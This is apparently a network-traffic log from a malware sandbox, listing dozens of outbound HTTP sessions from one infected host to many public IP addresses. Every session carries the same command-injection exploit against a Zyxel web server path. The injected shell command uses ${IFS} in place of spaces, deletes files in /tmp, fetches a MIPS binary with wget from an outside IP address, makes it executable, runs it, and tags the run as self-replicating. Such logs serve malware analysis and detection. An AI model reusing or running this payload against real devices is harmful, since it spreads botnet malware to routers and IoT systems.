                                                        Jan 28, 2024 10:13:08.717108011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8495192.168.2.1453366198.53.98.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717175961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8496192.168.2.1448748209.141.145.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717180967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8497192.168.2.1449362139.193.252.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717237949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8498192.168.2.145008098.72.114.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717242956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8499192.168.2.145379663.187.248.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717346907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8500192.168.2.1447380182.241.121.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717405081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8501192.168.2.1437596147.56.247.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717441082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8502192.168.2.1454914155.230.154.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717473030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8503192.168.2.144640825.58.172.233443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717509031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8504192.168.2.145494643.159.197.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717540026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8505192.168.2.1433744181.31.247.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717587948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8506192.168.2.146041477.76.73.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717631102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8507192.168.2.143923281.7.2.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717667103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8508192.168.2.143564879.25.218.238443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717708111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8509192.168.2.1459408221.88.17.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717740059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8510192.168.2.1452380136.254.174.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717771053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8511192.168.2.1447782105.96.65.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717806101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8512192.168.2.145389250.233.72.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717839956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8513192.168.2.1452304186.82.206.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717876911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8514192.168.2.1441032124.69.86.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717919111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8515192.168.2.1449264170.250.245.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717952013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8516192.168.2.1454494121.94.31.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.717984915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8517192.168.2.1455642124.240.215.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718013048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8518192.168.2.145866297.79.82.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718069077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8519192.168.2.143573092.151.164.67443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718106031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8520192.168.2.144242254.248.169.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718128920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8521192.168.2.145722057.246.39.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718163013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8522192.168.2.14558629.59.22.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718223095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8523192.168.2.144097448.71.20.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718247890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8524192.168.2.1460026198.148.215.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718296051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8525192.168.2.1457518147.251.181.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718317986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8526192.168.2.144759013.251.105.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718388081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8527192.168.2.144655660.206.183.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718420029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8528192.168.2.1446710192.62.33.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718465090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8529192.168.2.1447462107.157.78.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718509912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8530192.168.2.1444120109.90.5.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718544960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8531192.168.2.1449750219.190.74.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718570948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8532192.168.2.1443432105.39.58.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718614101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8533192.168.2.1445958177.89.152.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718666077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8534192.168.2.145250081.111.102.138443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718698025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8535192.168.2.1445648140.74.198.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718744040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8536192.168.2.1447604125.2.211.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718759060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8537192.168.2.1452116197.82.215.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718807936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8538192.168.2.1443656122.200.191.84443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718856096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8539192.168.2.1448252221.153.172.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718919992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8540192.168.2.1444992120.50.168.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718926907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8541192.168.2.1434442212.160.30.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.718981028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8542192.168.2.1460400113.168.114.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719034910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8543192.168.2.1437220125.18.20.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719083071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8544192.168.2.1433990188.224.80.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719099045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8545192.168.2.143875638.42.27.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719130039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8546192.168.2.1449352210.71.54.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719171047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8547192.168.2.1455126167.135.124.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719197989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8548192.168.2.144966460.144.25.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719237089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8549192.168.2.1459828142.222.130.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719271898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8550192.168.2.1438666191.227.235.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719321966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8551192.168.2.1452034218.192.111.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719351053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8552192.168.2.145213464.84.26.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719388962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8553192.168.2.1437314170.73.235.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719419003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8554192.168.2.1435140122.162.172.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719459057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8555192.168.2.1446932184.113.237.254443
                                                        TimestampBytes transferredDirectionData
